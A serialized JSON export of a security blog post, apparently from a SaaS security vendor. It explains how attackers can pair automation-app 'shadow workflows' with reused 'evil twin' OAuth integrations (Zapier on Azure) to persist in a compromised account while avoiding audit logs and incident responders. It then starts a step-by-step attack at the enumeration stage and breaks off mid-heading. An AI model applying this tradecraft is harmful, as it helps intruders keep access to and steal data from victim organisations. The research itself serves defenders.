data":267171,"marks":267172,"value":259111,"nodeType":173},{},[],{"data":267174,"content":267175,"nodeType":178},{},[267176],{"data":267177,"marks":267178,"value":259118,"nodeType":173},{},[],{"data":267180,"content":267181,"nodeType":178},{},[267182],{"data":267183,"marks":267184,"value":259125,"nodeType":173},{},[],{"data":267186,"content":267187,"nodeType":178},{},[267188],{"data":267189,"marks":267190,"value":259132,"nodeType":173},{},[],{"data":267192,"content":267195,"nodeType":312},{"target":267193},{"sys":267194},{"id":259137,"type":317,"linkType":318},[],{"data":267197,"content":267198,"nodeType":178},{},[267199],{"data":267200,"marks":267201,"value":259145,"nodeType":173},{},[],{"data":267203,"content":267204,"nodeType":178},{},[267205,267208,267215],{"data":267206,"marks":267207,"value":259152,"nodeType":173},{},[],{"data":267209,"content":267210,"nodeType":186},{"uri":259155},[267211],{"data":267212,"marks":267213,"value":259161,"nodeType":173},{},[267214],{"type":194},{"data":267216,"marks":267217,"value":1477,"nodeType":173},{},[],{"data":267219,"content":267220,"nodeType":169},{},[267221],{"data":267222,"marks":267223,"value":259171,"nodeType":173},{},[],{"data":267225,"content":267226,"nodeType":178},{},[267227],{"data":267228,"marks":267229,"value":259178,"nodeType":173},{},[],{"data":267231,"content":267232,"nodeType":178},{},[267233],{"data":267234,"marks":267235,"value":259185,"nodeType":173},{},[],{"data":267237,"content":267238,"nodeType":178},{},[267239],{"data":267240,"marks":267241,"value":259192,"nodeType":173},{},[],{"data":267243,"content":267244,"nodeType":178},{},[267245],{"data":267246,"marks":267247,"value":259199,"nodeType":173},{},[],{"data":267249,"content":267250,"nodeType":178},{},[267251],{"data":267252,"marks":267253,"value":259206,"nodeType":173},{},[],{"data":267255,"content":267256,"nodeType":250},{},[267257,267266,267275,267284],{"data":267258,"content":267259,"nodeType":254},{},[267260],{"data":267261,"content":267262,"nodeType":178},{},[267263],{"data":267264,"marks":267265,"value":259219,"nodeType":173},{},[],{"data":267267,"content":267268,"nodeType":254},{},[267269],{"data":267270,"content":267271,"nodeType":178},{},[267272],{"data":267273,"marks":267274,"value":259229,"nodeType":173},{},[],{"data":267276,"content":267277,"nodeType":254},{},[267278],{"data":267279,"content":267280,"nodeType":178},{},[267281],{"data":267282,"marks":267283,"value":259239,"nodeType":173},{},[],{"data":267285,"content":267286,"nodeType":254},{},[267287],{"data":267288,"content":267289,"nodeType":178},{},[267290],{"data":267291,"marks":267292,"value":259249,"nodeType":173},{},[],{"data":267294,"content":267295,"nodeType":178},{},[267296],{"data":267297,"marks":267298,"value":259256,"nodeType":173},{},[],{"data":267300,"content":267301,"nodeType":250},{},[267302,267331],{"data":267303,"content":267304,"nodeType":254},{},[267305],{"data":267306,"content":267307,"nodeType":178},{},[267308,267311,267318,267321,267328],{"data":267309,"marks":267310,"value":259269,"nodeType":173},{},[],{"data":267312,"content":267313,"nodeType":186},{"uri":59347},[267314],{"data":267315,"marks":267316,"value":59350,"nodeType":173},{},[267317],{"type":194},{"data":267319,"marks":267320,"value":933,"nodeType":173},{},[],{"data":267322,"content":267323,"nodeType":186},{"uri":832},[267324],{"data":267325,"marks":267326,"value":835,"nodeType":173},{},[267327],{"type":194},{"data":267329,"marks":267330,"value":37,"nodeType":173},{},[],{"data":267332,"content":267333,"nodeType":254},{},[267334],{"data":267335,"content":267336,"nodeType":178},{},[267337,267340,267347],{"data":267338,"marks":267339,"value":259299,"nodeType":173},{},[],{"data":267341,"content":267342,"nodeType":186},{"uri":230093},[267343],{"data":267344,"marks":267345,"value":259307,"nodeType":173},{},[267346],{"type":194},{"data":267348,"marks":267349,"value":259311,"nodeType":173},{},[],{"data":267351,"content":267352,"nodeType":169},{},[267353],{"data":267354,"marks":267355,"value":15539,"nodeType":173},{},[],{"data":267357,"content":267358,"nodeType":178},{},[267359],{"data":267360,"marks":267361,"value":259324,"nodeType":173},{},[],{"data":267363,"content":267364,"nodeType":250},{},[267365,267374,267383,267392,267401,267410],{"data":267366,"content":267367,"nodeType":254},{},[267368],{"data":267369,"content":267370,"nodeType":178},{},[267371],{"data":267372,"marks":267373,"value":259337,"nodeType":173},{},[],{"data":267375,"content":267376,"nodeType":254},{},[267377],{"data":267378,"content":267379,"nodeType":178},{},[267380],{"data":267381,"marks":267382,"value":259347,"nodeType":173},{},[],{"data":267384,"content":267385,"nodeType":254},{},[267386],{"data":267387,"content":267388,"nodeType":178},{},[267389],{"data":267390,"marks":267391,"value":259357,"nodeType":173},{},[],{"data":267393,"content":267394,"nodeType":254},{},[267395],{"data":267396,"content":267397,"nodeType":178},{},[267398],{"data":267399,"marks":267400,"value":259367,"nodeType":173},{},[],{"data":267402,"content":267403,"nodeType":254},{},[267404],{"data":267405,"content":267406,"nodeType":178},{},[267407],{"data":267408,"marks":267409,"value":259377,"nodeType":173},{},[],{"data":267411,"content":267412,"nodeType":254},{},[267413],{"data":267414,"content":267415,"nodeType":178},{},[267416],{"data":267417,"marks":267418,"value":259387,"nodeType":173},{},[],{"data":267420,"content":267421,"nodeType":169},{},[267422],{"data":267423,"marks":267424,"value":40632,"nodeType":173},{},[],{"data":267426,"content":267427,"nodeType":178},{},[267428],{"data":267429,"marks":267430,"value":259400,"nodeType":173},{},[],{"data":267432,"content":267433,"nodeType":178},{},[267434],{"data":267435,"marks":267436,"value":259407,"nodeType":173},{},[],{"data":267438,"content":267439,"nodeType":178},{},[267440],{"data":267441,"marks":267442,"value":259414,"nodeType":173},{},[],{"data":267444,"content":267445,"nodeType":178},{},[267446],{"data":267447,"marks":267448,"value":259421,"nodeType":173},{},[],{"data":267450,"content":267451,"nodeType":178},{},[267452],{"data":267453,"marks":267454,"value":259428,"nodeType":173},{},[],{"data":267456,"content":267457,"nodeType":178},{},[267458],{"data":267459,"marks":267460,"value":259435,"nodeType":173},{},[],{"items":267462},[267463,267465],{"sys":267464,"name":26137},{"id":26136},{"sys":267466,"name":509},{"id":508},{"items":267468},[267469],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":267470},{"url":8615},{"__typename":1528,"sys":267472,"content":267473,"title":252406,"synopsis":259904,"hashTags":118,"publishedDate":259905,"slug":252407,"tagsCollection":267867,"authorsCollection":267873},{"id":228244},{"json":267474},{"data":267475,"content":267476,"nodeType":165},{},[267477,267493,267499,267505,267511,267527,267533,267549,267555,267561,267567,267573,267579,267585,267591,267607,267613,267619,267624,267630,267636,267642,267647,267652,267657,267663,267669,267674,267680,267686,267692,267697,267703,267709,267715,267721,267727,267732,267738,267744,267749,267755,267761,267766,267772,267778,267837,267843,267849,267855,267861],{"data":267478,"content":267479,"nodeType":178},{},[267480,267483,267490],{"data":267481,"marks":267482,"value":259462,"nodeType":173},{},[],{"data":267484,"content":267485,"nodeType":186},{"uri":88239},[267486],{"data":267487,"marks":267488,"value":88742,"nodeType":173},{},[267489],{"type":194},{"data":267491,"marks":267492,"value":259473,"nodeType":173},{},[],{"data":267494,"content":267495,"nodeType":178},{},[267496],{"data":267497,"marks":267498,"value":259480,"nodeType":173},{},[],{"data":267500,"content":267501,"nodeType":178},{},[267502],{"data":267503,"marks":267504,"value":259487,"nodeType":173},{},[],{"data":267506,"content":267507,"nodeType":169},{},[267508],{"data":267509,"marks":267510,"value":227960,"nodeType":173},{},[],{"data":267512,"content":267513,"nodeType":178},{},[267514,267517,267524],{"data":267515,"marks":267516,"value":37,"nodeType":173},{},[],{"data":267518,"content":267519,"nodeType":186},{"uri":208521},[267520],{"data":267521,"marks":267522,"value":227973,"nodeType":173},{},[267523],{"type":194},{"data":267525,"marks":267526,"value":227977,"nodeType":173},{},[],{"data":267528,"content":267529,"nodeType":169},{},[267530],{"data":267531,"marks":267532,"value":259516,"nodeType":173},{},[],{"data":267534,"content":267535,"nodeType":178},{},[267536,267539,267546],{"data":267537,"marks":267538,"value":37,"nodeType":173},{},[],{"data":267540,"content":267541,"nodeType":186},{"uri":63250},[267542],{"data":267543,"marks":267544,"value":63256,"nodeType":173},{},[267545],{"type":194},{"data":267547,"marks":267548,"value":259533,"nodeType":173},{},[],{"data":267550,"content":267551,"nodeType":169},{},[267552],{"data":267553,"marks":267554,"value":259540,"nodeType":173},{},[],{"data":267556,"content":267557,"nodeType":178},{},[267558],{"data":267559,"marks":267560,"value":259547,"nodeType":173},{},[],{"data":267562,"content":267563,"nodeType":178},{},[267564],{"data":267565,"marks":267566,"value":259554,"nodeType":173},{},[],{"data":267568,"content":267569,"nodeType":178},{},[267570],{"data":267571,"marks":267572,"value":259561,"nodeType":173},{},[],{"data":267574,"content":267575,"nodeType":178},{},[267576],{"data":267577,"marks":267578,"value":259568,"nodeType":173},{},[],{"data":267580,"content":267581,"nodeType":178},{},[267582],{"data":267583,"marks":267584,"value":259575,"nodeType":173},{},[],{"data":267586,"content":267587,"nodeType":169},{},[267588],{"data":267589,"marks":267590,"value":259582,"nodeType":173},{},[],{"data":267592,"content":267593,"nodeType":178},{},[267594,267597,267604],{"data":267595,"marks":267596,"value":259589,"nodeType":173},{},[],{"data":267598,"content":267599,"nodeType":186},{"uri":259592},[267600],{"data":267601,"marks":267602,"value":259598,"nodeType":173},{},[267603],{"type":194},{"data":267605,"marks":267606,"value":259602,"nodeType":173},{},[],{"data":267608,"content":267609,"nodeType":178},{},[267610],{"data":267611,"marks":267612,"value":259609,"nodeType":173},{},[],{"data":267614,"content":267615,"nodeType":178},{},[267616],{"data":267617,"marks":267618,"value":259616,"nodeType":173},{},[],{"data":267620,"content":267623,"nodeType":312},{"target":267621},{"sys":267622},{"id":259621,"type":317,"linkType":318},[],{"data":267625,"content":267626,"nodeType":178},{},[267627],{"data":267628,"marks":267629,"value":259629,"nodeType":173},{},[],{"data":267631,"content":267632,"nodeType":235},{},[267633],{"data":267634,"marks":267635,"value":259636,"nodeType":173},{},[],{"data":267637,"content":267638,"nodeType":178},{},[267639],{"data":267640,"marks":267641,"value":259643,"nodeType":173},{},[],{"data":267643,"content":267646,"nodeType":312},{"target":267644},{"sys":267645},{"id":259648,"type":317,"linkType":318},[],{"data":267648,"content":267651,"nodeType":312},{"target":267649},{"sys":267650},{"id":259654,"type":317,"linkType":318},[],{"data":267653,"content":267656,"nodeType":312},{"target":267654},{"sys":267655},{"id":259660,"type":317,"linkType":318},[],{"data":267658,"content":267659,"nodeType":235},{},[267660],{"data":267661,"marks":267662,"value":259668,"nodeType":173},{},[],{"data":267664,"content":267665,"nodeType":178},{},[267666],{"data":267667,"marks":267668,"value":259675,"nodeType":173},{},[],{"data":267670,"content":267673,"nodeType":312},{"target":267671},{"sys":267672},{"id":259680,"type":317,"linkType":318},[],{"data":267675,"content":267676,"nodeType":235},{},[267677],{"data":267678,"marks":267679,"value":259688,"nodeType":173},{},[],{"data":267681,"content":267682,"nodeType":178},{},[267683],{"data":267684,"marks":267685,"value":259695,"nodeType":173},{},[],{"data":267687,"content":267688,"nodeType":178},{},[267689],{"data":267690,"marks":267691,"value":259702,"nodeType":173},{},[],{"data":267693,"content":267696,"nodeType":312},{"target":267694},{"sys":267695},{"id":259707,"type":317,"linkType":318},[],{"data":267698,"content":267699,"nodeType":178},{},[267700],{"data":267701,"marks":267702,"value":259715,"nodeType":173},{},[],{"data":267704,"content":267705,"nodeType":169},{},[267706],{"data":267707,"marks":267708,"value":259722,"nodeType":173},{},[],{"data":267710,"content":267711,"nodeType":235},{},[267712],{"data":267713,"marks":267714,"value":259729,"nodeType":173},{},[],{"data":267716,"content":267717,"nodeType":178},{},[267718],{"data":267719,"marks":267720,"value":259736,"nodeType":173},{},[],{"data":267722,"content":267723,"nodeType":178},{},[267724],{"data":267725,"marks":267726,"value":259743,"nodeType":173},{},[],{"data":267728,"content":267731,"nodeType":312},{"target":267729},{"sys":267730},{"id":259748,"type":317,"linkType":318},[],{"data":267733,"content":267734,"nodeType":235},{},[267735],{"data":267736,"marks":267737,"value":259756,"nodeType":173},{},[],{"data":267739,"content":267740,"nodeType":178},{},[267741],{"data":267742,"marks":267743,"value":259763,"nodeType":173},{},[],{"data":267745,"content":267748,"nodeType":312},{"target":267746},{"sys":267747},{"id":259768,"type":317,"linkType":318},[],{"data":267750,"content":267751,"nodeType":178},{},[267752],{"data":267753,"marks":267754,"value":259776,"nodeType":173},{},[],{"data":267756,"content":267757,"nodeType":178},{},[267758],{"data":267759,"marks":267760,"value":259783,"nodeType":173},{},[],{"data":267762,"content":267765,"nodeType":312},{"target":267763},{"sys":267764},{"id":259788,"type":317,"linkType":318},[],{"data":267767,"content":267768,"nodeType":169},{},[267769],{"data":267770,"marks":267771,"value":15539,"nodeType":173},{},[],{"data":267773,"content":267774,"nodeType":178},{},[267775],{"data":267776,"marks":267777,"value":259802,"nodeType":173},{},[],{"data":267779,"content":267780,"nodeType":250},{},[267781,267790,267799,267818],{"data":267782,"content":267783,"nodeType":254},{},[267784],{"data":267785,"content":267786,"nodeType":178},{},[267787],{"data":267788,"marks":267789,"value":259815,"nodeType":173},{},[],{"data":267791,"content":267792,"nodeType":254},{},[267793],{"data":267794,"content":267795,"nodeType":178},{},[267796],{"data":267797,"marks":267798,"value":259825,"nodeType":173},{},[],{"data":267800,"content":267801,"nodeType":254},{},[267802],{"data":267803,"content":267804,"nodeType":178},{},[267805,267808,267815],{"data":267806,"marks":267807,"value":259835,"nodeType":173},{},[],{"data":267809,"content":267810,"nodeType":186},{"uri":259838},[267811],{"data":267812,"marks":267813,"value":259844,"nodeType":173},{},[267814],{"type":194},{"data":267816,"marks":267817,"value":37,"nodeType":173},{},[],{"data":267819,"content":267820,"nodeType":254},{},[267821],{"data":267822,"content":267823,"nodeType":178},{},[267824,267827,267834],{"data":267825,"marks":267826,"value":259857,"nodeType":173},{},[],{"data":267828,"content":267829,"nodeType":186},{"uri":259860},[267830],{"data":267831,"marks":267832,"value":259866,"nodeType":173},{},[267833],{"type":194},{"data":267835,"marks":267836,"value":37,"nodeType":173},{},[],{"data":267838,"content":267839,"nodeType":178},{},[267840],{"data":267841,"marks":267842,"value":259876,"nodeType":173},{},[],{"data":267844,"content":267845,"nodeType":235},{},[267846],{"data":267847,"marks":267848,"value":40632,"nodeType":173},{},[],{"data":267850,"content":267851,"nodeType":178},{},[267852],{"data":267853,"marks":267854,"value":259889,"nodeType":173},{},[],{"data":267856,"content":267857,"nodeType":178},{},[267858],{"data":267859,"marks":267860,"value":259896,"nodeType":173},{},[],{"data":267862,"content":267863,"nodeType":178},{},[267864],{"data":267865,"marks":267866,"value":259903,"nodeType":173},{},[],{"items":267868},[267869,267871],{"sys":267870,"name":505},{"id":504},{"sys":267872,"name":509},{"id":508},{"items":267874},[267875],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":267876},{"url":8615},{"__typename":1528,"sys":267878,"content":267880,"title":268752,"synopsis":267888,"hashTags":118,"publishedDate":268753,"slug":268754,"tagsCollection":268755,"authorsCollection":268761},{"id":267879},"7ygI4NLJ2zpuiVwAlggkTG",{"json":267881},{"nodeType":165,"data":267882,"content":267883},{},[267884,267891,267898,267928,267935,267942,267960,267967,267974,267981,268008,268014,268021,268037,268044,268051,268084,268091,268098,268105,268112,268119,268125,268132,268139,268146,268154,268161,268181,268188,268195,268202,268209,268216,268223,268230,268237,268244,268250,268257,268276,268283,268302,268308,268314,268320,268327,268334,268341,268347,268353,268360,268367,268374,268381,268388,268394,268412,268431,268438,268444,268450,268457,268464,268471,268478,268501,268507,268513,268520,268527,268534,268545,268551,268558,268564,268570,268577,268584,268591,268597,268603,268609,268616,268732,268738,268745],{"nodeType":178,"data":267885,"content":267886},{},[267887],{"nodeType":173,"value":267888,"marks":267889,"data":267890},"In this article, we’re going to demonstrate how combining two of our favorite new SaaS attack techniques makes a simple, but very stealthy persistence approach.",[],{},{"nodeType":178,"data":267892,"content":267893},{},[267894],{"nodeType":173,"value":267895,"marks":267896,"data":267897},"—----",[],{},{"nodeType":178,"data":267899,"content":267900},{},[267901,267905,267912,267916,267925],{"nodeType":173,"value":267902,"marks":267903,"data":267904},"This is the second post in a series on attack chains formed by combining techniques in the ",[],{},{"nodeType":186,"data":267906,"content":267907},{"uri":88239},[267908],{"nodeType":173,"value":88742,"marks":267909,"data":267911},[267910],{"type":194},{},{"nodeType":173,"value":267913,"marks":267914,"data":267915},". Last post we wrote about ",[],{},{"nodeType":1698,"data":267917,"content":267920},{"target":267918},{"sys":267919},{"id":228244,"type":317,"linkType":318},[267921],{"nodeType":173,"value":252406,"marks":267922,"data":267924},[267923],{"type":194},{},{"nodeType":173,"value":197,"marks":267926,"data":267927},[],{},{"nodeType":178,"data":267929,"content":267930},{},[267931],{"nodeType":173,"value":267932,"marks":267933,"data":267934},"This time we’ll be looking at combining shadow workflows with an evil twin integration for an especially sneaky and flexible method of persistence. We’ll be using Zapier integrating with Azure as our primary example. ",[],{},{"nodeType":169,"data":267936,"content":267937},{},[267938],{"nodeType":173,"value":267939,"marks":267940,"data":267941},"What is a shadow workflow?",[],{},{"nodeType":178,"data":267943,"content":267944},{},[267945,267948,267956],{"nodeType":173,"value":15816,"marks":267946,"data":267947},[],{},{"nodeType":186,"data":267949,"content":267950},{"uri":144083},[267951],{"nodeType":173,"value":267952,"marks":267953,"data":267955},"shadow workflow ",[267954],{"type":194},{},{"nodeType":173,"value":267957,"marks":267958,"data":267959},"is a technique for using SaaS automation apps to provide a code execution-like method for conducting malicious actions from a legitimate source using OAuth integrations. This could be a daily export of files from shared cloud drives, automatic forwarding and deleting of emails, cloning instant messages, exporting user directories — basically anything that is possible using the target app’s API. ",[],{},{"nodeType":178,"data":267961,"content":267962},{},[267963],{"nodeType":173,"value":267964,"marks":267965,"data":267966},"The fact automation apps utilize OAuth integrations means they also function as a very effective method of maintaining persistence. Think of shadow workflows as the offensive PowerShell of the SaaS world. ",[],{},{"nodeType":169,"data":267968,"content":267969},{},[267970],{"nodeType":173,"value":267971,"marks":267972,"data":267973},"What’s an evil twin integration?",[],{},{"nodeType":178,"data":267975,"content":267976},{},[267977],{"nodeType":173,"value":267978,"marks":267979,"data":267980},"Creating a new OAuth integration, even if using a legitimate SaaS application, could be viewed as suspicious if seen by a security team or the affected user. This is especially true if an account compromise is discovered and an IR team sees a consent for a new OAuth integration in the log that the compromised user does not recognize. ",[],{},{"nodeType":178,"data":267982,"content":267983},{},[267984,267987,267994,267998,268004],{"nodeType":173,"value":96646,"marks":267985,"data":267986},[],{},{"nodeType":186,"data":267988,"content":267989},{"uri":59335},[267990],{"nodeType":173,"value":208649,"marks":267991,"data":267993},[267992],{"type":194},{},{"nodeType":173,"value":267995,"marks":267996,"data":267997},", however, reduces the chances of discovery by reusing an existing ",[],{},{"nodeType":173,"value":267999,"marks":268000,"data":268003},"legitimate",[268001,268002],{"type":1646},{"type":370},{},{"nodeType":173,"value":268005,"marks":268006,"data":268007}," integration for malicious purposes.",[],{},{"nodeType":169,"data":268009,"content":268010},{},[268011],{"nodeType":173,"value":259540,"marks":268012,"data":268013},[],{},{"nodeType":178,"data":268015,"content":268016},{},[268017],{"nodeType":173,"value":268018,"marks":268019,"data":268020},"While shadow workflows are incredibly powerful on their own, as malicious use of OAuth integrations becomes more common, security teams will start regularly checking for new, or unknown, integrations in response to security incidents. While automation apps are legitimate SaaS services, shadow workflow attacks could still raise question marks during incident response if it’s connected shortly after a compromise and/or if the affected user has no knowledge of it. ",[],{},{"nodeType":178,"data":268022,"content":268023},{},[268024,268028,268033],{"nodeType":173,"value":268025,"marks":268026,"data":268027},"Additionally, as use of security tools that ",[],{},{"nodeType":173,"value":268029,"marks":268030,"data":268032},"provide visibility of OAuth integrations",[268031],{"type":194},{},{"nodeType":173,"value":268034,"marks":268035,"data":268036}," (check out our product) increases, it will become increasingly dangerous for an adversary to create a new OAuth integration. That’s because the target user and possibly even security teams may be notified.",[],{},{"nodeType":178,"data":268038,"content":268039},{},[268040],{"nodeType":173,"value":268041,"marks":268042,"data":268043},"This leads us on to evil twin integrations. Their power is in making use of existing integrations so they can avoid appearing as a new integration and getting flagged or sending alerts to security teams. That makes them much stealthier and increases the likelihood of a successful attack. ",[],{},{"nodeType":178,"data":268045,"content":268046},{},[268047],{"nodeType":173,"value":268048,"marks":268049,"data":268050},"There are three possibilities here that lead to two different levels of stealth for the attack:",[],{},{"nodeType":246189,"data":268052,"content":268053},{},[268054,268064,268074],{"nodeType":254,"data":268055,"content":268056},{},[268057],{"nodeType":178,"data":268058,"content":268059},{},[268060],{"nodeType":173,"value":268061,"marks":268062,"data":268063},"Medium stealth option: Making use of an automation app used legitimately by the organization, but not by the target user, specifically",[],{},{"nodeType":254,"data":268065,"content":268066},{},[268067],{"nodeType":178,"data":268068,"content":268069},{},[268070],{"nodeType":173,"value":268071,"marks":268072,"data":268073},"High stealth option 1: Making use of an automation app used legitimately by the target user themselves",[],{},{"nodeType":254,"data":268075,"content":268076},{},[268077],{"nodeType":178,"data":268078,"content":268079},{},[268080],{"nodeType":173,"value":268081,"marks":268082,"data":268083},"High stealth option 2: Making use of an automation app that has been granted admin consent",[],{},{"nodeType":235,"data":268085,"content":268086},{},[268087],{"nodeType":173,"value":268088,"marks":268089,"data":268090},"Medium stealth option: Pre-existing use by organization",[],{},{"nodeType":178,"data":268092,"content":268093},{},[268094],{"nodeType":173,"value":268095,"marks":268096,"data":268097},"This option is by far the most likely option to be applicable in a real-world situation. Here’s how it works:",[],{},{"nodeType":178,"data":268099,"content":268100},{},[268101],{"nodeType":173,"value":268102,"marks":268103,"data":268104},"The consent for the targeted user will be new and will generate an audit event to show that, but the integration itself will not be new inside the organization and may even be formally approved by the security team already. This will help evade general detection mechanisms as it won’t be seen as a brand new integration at the organization level that requires careful scrutiny. It’s much harder to evaluate new consents on a per-user basis for existing integrations if the organization is of any significant size.",[],{},{"nodeType":178,"data":268106,"content":268107},{},[268108],{"nodeType":173,"value":268109,"marks":268110,"data":268111},"The downside, however, is that this attack stands a greater chance of detection if notifications are delivered directly to the affected user. Alternatively, if the original compromise is discovered, incident responders are more likely to discover this consent during an investigation. That’s because the affected user would know they aren’t using the automation app and incident responders are likely to explore logs showing consents to new OAuth integrations and permissions shortly after a successful compromise.",[],{},{"nodeType":178,"data":268113,"content":268114},{},[268115],{"nodeType":173,"value":268116,"marks":268117,"data":268118},"Using Azure as an example, while no new service principal is created in this case, the audit logs still show a new consent for the targeted user to the existing Zapier app: ",[],{},{"nodeType":312,"data":268120,"content":268124},{"target":268121},{"sys":268122},{"id":268123,"type":317,"linkType":318},"7m0E0sOulc348jhQguQLb1",[],{"nodeType":235,"data":268126,"content":268127},{},[268128],{"nodeType":173,"value":268129,"marks":268130,"data":268131},"High stealth option 1: Pre-existing use by targeted user",[],{},{"nodeType":178,"data":268133,"content":268134},{},[268135],{"nodeType":173,"value":268136,"marks":268137,"data":268138},"This is the holy grail option, but is likely to require more luck in the real world. It requires that the target user is already using an automation app, which the adversary could compromise and utilize. If the compromised user has already consented to permissions useful to the adversary, such as access to sensitive data like email and file stores, then new malicious workflows can be created without requiring the user to consent to new permissions. ",[],{},{"nodeType":178,"data":268140,"content":268141},{},[268142],{"nodeType":173,"value":268143,"marks":268144,"data":268145},"Consequently, there will be no new integration observed at the organization level, no new user-specific consents for sensitive permissions and the target user would indicate they’re just using a legitimate app if questioned by incident responders. ",[],{},{"nodeType":178,"data":268147,"content":268148},{},[268149],{"nodeType":173,"value":268150,"marks":268151,"data":268153},"None of the three audit log entries shown above would be present in this scenario either.",[268152],{"type":370},{},{"nodeType":235,"data":268155,"content":268156},{},[268157],{"nodeType":173,"value":268158,"marks":268159,"data":268160},"High stealth option 2: Azure admin consented app",[],{},{"nodeType":178,"data":268162,"content":268163},{},[268164,268168,268177],{"nodeType":173,"value":268165,"marks":268166,"data":268167},"There is a mixed scenario when permissions for an automation app (or any app you want to use for an evil twin integration) have been granted tenant-wide ",[],{},{"nodeType":186,"data":268169,"content":268171},{"uri":268170},"https://learn.microsoft.com/en-us/azure/active-directory/manage-apps/user-admin-consent-overview#admin-consent",[268172],{"nodeType":173,"value":268173,"marks":268174,"data":268176},"admin consent in Azure",[268175],{"type":194},{},{"nodeType":173,"value":268178,"marks":268179,"data":268180},". In this case, the administrator has effectively consented to permissions for all users, even if they aren’t currently active users of the app. ",[],{},{"nodeType":178,"data":268182,"content":268183},{},[268184],{"nodeType":173,"value":268185,"marks":268186,"data":268187},"This means when a new user integrates the app, it does not generate a new permission grant since it is effectively already granted. Consequently, the three log entries shown above would not be present in this scenario even if integrating the app for a user that has never used it before.",[],{},{"nodeType":178,"data":268189,"content":268190},{},[268191],{"nodeType":173,"value":268192,"marks":268193,"data":268194},"This gives the best level of flexibility for an adversary as they can avoid generating new permission grant logs for any user. However, it's not quite as stealthy as when the targeted user already makes use of the app as there is no history of legitimate app logins or activity for the user prior to the compromise to blend in with.",[],{},{"nodeType":169,"data":268196,"content":268197},{},[268198],{"nodeType":173,"value":268199,"marks":268200,"data":268201},"An example attack - Zapier",[],{},{"nodeType":178,"data":268203,"content":268204},{},[268205],{"nodeType":173,"value":268206,"marks":268207,"data":268208},"In this case, we’re going to use Zapier as our automation app example and Azure as the primary target for integrations and there will be no admin consent involved. We’ll also be using Google Workspace for data exfiltration. There are many other examples we could have used here, though - Make.com, IFTTT, Retool, Tines, Microsoft Power Automate and many other SaaS apps have powerful automation and integration capabilities and could be used for similar purposes. ",[],{},{"nodeType":178,"data":268210,"content":268211},{},[268212],{"nodeType":173,"value":268213,"marks":268214,"data":268215},"Azure and Google Workspace are also obvious juicy targets for integrations, but automation apps support integrations with vast numbers of other SaaS applications,so there are many possible targets.",[],{},{"nodeType":178,"data":268217,"content":268218},{},[268219],{"nodeType":173,"value":268220,"marks":268221,"data":268222},"So, let’s say we’ve compromised a target user’s Azure account. Perhaps we have conducted a successful credential stuffing attack, a phishing attack including MFA code proxying or even achieved a traditional endpoint compromise and have stolen the user’s session tokens.",[],{},{"nodeType":178,"data":268224,"content":268225},{},[268226],{"nodeType":173,"value":268227,"marks":268228,"data":268229},"Whatever the case, we have temporary control of the user’s account, either until the session expires or the user changes their password. If the original compromise is detected, that could happen quickly, so we want to conduct some malicious actions to make use of the access while we have it and to also gain persistence so we maintain our access beyond a password change.",[],{},{"nodeType":178,"data":268231,"content":268232},{},[268233],{"nodeType":173,"value":268234,"marks":268235,"data":268236},"We want to use an automation app, but we’d prefer to be as stealthy as possible by also making it an evil twin integration. We’d like to see if the target user has existing integrations with any apps we’d like to use - especially an automation app for that high stealth option we mentioned above. ",[],{},{"nodeType":178,"data":268238,"content":268239},{},[268240],{"nodeType":173,"value":268241,"marks":268242,"data":268243},"We’ve created a video demo of the full attack below. A step by step write up with more detail then follows:",[],{},{"nodeType":312,"data":268245,"content":268249},{"target":268246},{"sys":268247},{"id":268248,"type":317,"linkType":318},"E1ZHBcjGLZAno0SRtJ3d3",[],{"nodeType":169,"data":268251,"content":268252},{},[268253],{"nodeType":173,"value":268254,"marks":268255,"data":268256},"Step 1 - Enumerating potential targets",[],{},{"nodeType":178,"data":268258,"content":268259},{},[268260,268264,268272],{"nodeType":173,"value":268261,"marks":268262,"data":268263},"We could perform something as simple as an email search for evidence of sign-ups, but that won’t necessarily show us if actual OAuth integrations have been configured and what permissions are in use. What we really need is a way to perform an ",[],{},{"nodeType":186,"data":268265,"content":268266},{"uri":197841},[268267],{"nodeType":173,"value":268268,"marks":268269,"data":268271},"OAuth token enumeration",[268270],{"type":194},{},{"nodeType":173,"value":268273,"marks":268274,"data":268275}," attack.",[],{},{"nodeType":235,"data":268277,"content":268278},{},[268279],{"nodeType":173,"value":268280,"marks":268281,"data":268282},"The first method: myapps.microsoft.com",[],{},{"nodeType":178,"data":268284,"content":268285},{},[268286,268290,268298],{"nodeType":173,"value":268287,"marks":268288,"data":268289},"Make use of ",[],{},{"nodeType":186,"data":268291,"content":268293},{"uri":268292},"https://myapps.microsoft.com",[268294],{"nodeType":173,"value":268292,"marks":268295,"data":268297},[268296],{"type":194},{},{"nodeType":173,"value":268299,"marks":268300,"data":268301}," to see which apps are listed and which permissions have been granted. We can see Zapier is in use and the user has granted it access to their email and files, making it a great target.",[],{},{"nodeType":312,"data":268303,"content":268307},{"target":268304},{"sys":268305},{"id":268306,"type":317,"linkType":318},"6dDez7xRZjliEJR6DAkWHa",[],{"nodeType":312,"data":268309,"content":268313},{"target":268310},{"sys":268311},{"id":268312,"type":317,"linkType":318},"7M0imWv4n3z1RYQu3AdMF5",[],{"nodeType":312,"data":268315,"content":268319},{"target":268316},{"sys":268317},{"id":268318,"type":317,"linkType":318},"3fwFBK03tc5g064k0IyADO",[],{"nodeType":235,"data":268321,"content":268322},{},[268323],{"nodeType":173,"value":268324,"marks":268325,"data":268326},"The second method: Microsoft’s graph API",[],{},{"nodeType":178,"data":268328,"content":268329},{},[268330],{"nodeType":173,"value":268331,"marks":268332,"data":268333},"\nMicrosoft’s graph API doesn’t make it possible to list out service principals without admin permissions, but you can enumerate individual OAuth permission grants and app role assignments for your own user account. ",[],{},{"nodeType":178,"data":268335,"content":268336},{},[268337],{"nodeType":173,"value":268338,"marks":268339,"data":268340},"The client ID listed for permission grants is actually the tenant-specific service principal ID, rather than the globally unique OAuth app ID, but the app role assignments call gives us the app display name. We can match up the IDs from the app role assignments with the OAuth permission grants to see which permissions have been granted to the given app. ",[],{},{"nodeType":312,"data":268342,"content":268346},{"target":268343},{"sys":268344},{"id":268345,"type":317,"linkType":318},"519mlRMbaZYBAVdSADwop7",[],{"nodeType":312,"data":268348,"content":268352},{"target":268349},{"sys":268350},{"id":268351,"type":317,"linkType":318},"3g4WBQBEvqx5mXXnZzZzUG",[],{"nodeType":169,"data":268354,"content":268355},{},[268356],{"nodeType":173,"value":268357,"marks":268358,"data":268359},"Step 2 - Create shadow 